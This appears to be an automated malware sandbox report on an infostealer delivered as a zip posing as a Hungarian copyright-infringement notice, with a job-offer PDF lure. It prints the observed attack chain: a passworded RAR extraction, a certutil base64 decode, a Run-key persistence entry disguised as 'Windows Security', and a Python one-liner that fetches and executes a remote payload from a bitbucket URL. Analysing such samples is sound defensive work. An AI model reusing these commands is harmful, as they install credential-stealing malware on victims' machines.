            Source: synaptics.exe, 00000023.00000003.2034071702.0000000002113000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2054763098.000000000211A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)
            Source: synaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
            Source: synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: synaptics.exe, 00000023.00000003.2201080353.00000000045E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.esat.kuleuven.be/cosic/publications/article-1432.pdf
            Source: synaptics.exe, 00000023.00000003.2216147301.00000000045ED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.000000000274A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.freedesktop.org/software/systemd/man/os-release.html
            Source: synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
            Source: synaptics.exe, 00000023.00000003.2133539100.00000000021DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc4627.txt
            Source: synaptics.exe, 00000023.00000002.2575405414.000000006C3D0000.00000002.00000001.01000000.00000011.sdmp, synaptics.exe, 00000023.00000002.2564984131.000000006C173000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://www.openssl.org/H
            Source: synaptics.exe, 00000023.00000003.2016114364.00000000020A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2030364344.0000000002094000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2001368000.0000000002086000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002088000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2028143651.00000000020A1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1995635317.0000000002076000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1992460407.000000000247B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988824062.0000000002174000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1995635317.0000000002086000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988313998.0000000002478000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1990298469.0000000002081000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2001368000.0000000002076000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2006887362.0000000002089000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2003895222.000000000247A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1990298469.0000000002076000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002076000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1994680702.00000000020A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1995635317.00000000020A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2003471328.000000000209A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1988127501.0000000002099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
            Source: synaptics.exe, 00000023.00000003.1907119440.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1937976815.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1935930288.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904725608.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1915176286.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1946403574.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2144294615.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1947553736.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2053830414.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904574093.0000000002034000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904725608.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2024336898.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1941916880.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1944517560.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1954644425.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2059049701.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1951246031.0000000002033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: synaptics.exe, 00000023.00000003.1958064050.0000000002165000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2499258870.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
            Source: synaptics.exe, 00000023.00000002.2476199037.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1913373470.0000000000D59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: synaptics.exe, 00000023.00000003.1887784322.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2472859961.00000000019D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
            Source: synaptics.exe, 00000023.00000003.1887784322.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1888834197.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1888793954.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/)
            Source: synaptics.exe, 00000023.00000003.2070792571.00000000020ED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.00000000020E3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2048353577.00000000020E4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2091470869.00000000020E4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2076836351.00000000020ED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2041218643.0000000001F8B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.00000000020E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
            Source: synaptics.exe, 00000023.00000002.2456483780.0000000000C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: synaptics.exe, 00000023.00000002.2483896913.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2320294846.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.000000000216C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: synaptics.exe, 00000023.00000003.2084198547.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2092863211.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2150769416.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2219374203.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2121139838.00000000020EE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2121634293.0000000002749000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2113697144.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2157009339.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.00000000020EF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2091470869.00000000020E4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.00000000020F1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2110641984.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081093217.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2098540705.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2173422749.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2205829752.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2192423602.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2083225319.0000000001F78000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2149525238.0000000002747000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081651279.000000000213C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\DLLs\python_tools.catJump to dropped file

            System Summary

            barindex
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\A vide.k .s k.pek gyqjtem.nye szerzQi jogv.delem alatt .ll a szerzQ .ltal.zip (copy)Jump to dropped file
            Source: Rar.exe.16.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: synaptics.exe.22.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.22.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: _overlapped.pyd.22.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f
            Source: classification engineClassification label: mal88.troj.spyw.win@70/1671@0/20
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf.16.drInitial sample: mailto:Job@glassdoor-mail.com
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf.16.drInitial sample: https://help.glassdoor.com/s/article/what-are-salary-estimates-in-job-listings?language=en_us
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf.16.drInitial sample: https://help.glassdoor.com/s/article/What-are-Salary-Estimates-in-Job-Listings?language=en_US
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf.16.drInitial sample: https://www.glassdoor.com/
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf.16.drInitial sample: http://wa.me/+17373828397
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-12 09-06-49-527.log
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..bat"
            Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: synaptics.exe, 00000023.00000002.2555381921.000000006BF41000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT item1, item2 FROM metadata;
            Source: synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT item1, item2 FROM metadata;01
            Source: synaptics.exe, 00000023.00000002.2555381921.000000006BF41000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: synaptics.exe, 00000023.00000002.2555381921.000000006BF41000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: synaptics.exe, 00000023.00000002.2555381921.000000006BF41000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: synaptics.exe, 00000023.00000002.2555381921.000000006BF41000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: synaptics.exe, 00000023.00000002.2555381921.000000006BF41000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: synaptics.exe, 00000023.00000002.2532783211.0000000005000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT a11, a102 FROM nssPrivate WHERE a102 = ?;
            Source: synaptics.exe, 00000023.00000003.2321595496.000000000208E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2261980733.00000000021B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: synaptics.exe, 00000023.00000002.2555381921.000000006BF41000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1948,i,15826648908994825402,11418272317416250006,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://t.ly/SjDNX"
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\" -spe -an -ai#7zMap20132:206:7zEvent12301
            Source: unknownProcess created: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe"
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..bat"
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe Rar x -pKPLbkjVZ5zAXUErg9hu3pw -inul -y QExvbmVOb25l.rar C:\Users\Public\QExvbmVOb25l
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf"
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2160 --field-trial-handle=1600,i,3555974175840820386,6288481564636944147,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1616,i,10171936117906713763,8070250402194629303,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /f
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\QExvbmVOb25l\synaptics.exe "C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1948,i,15826648908994825402,11418272317416250006,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..bat"Jump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe Rar x -pKPLbkjVZ5zAXUErg9hu3pw -inul -y QExvbmVOb25l.rar C:\Users\Public\QExvbmVOb25lJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /fJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\QExvbmVOb25l\synaptics.exe "C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf"Jump to behavior
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2160 --field-trial-handle=1600,i,3555974175840820386,6288481564636944147,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
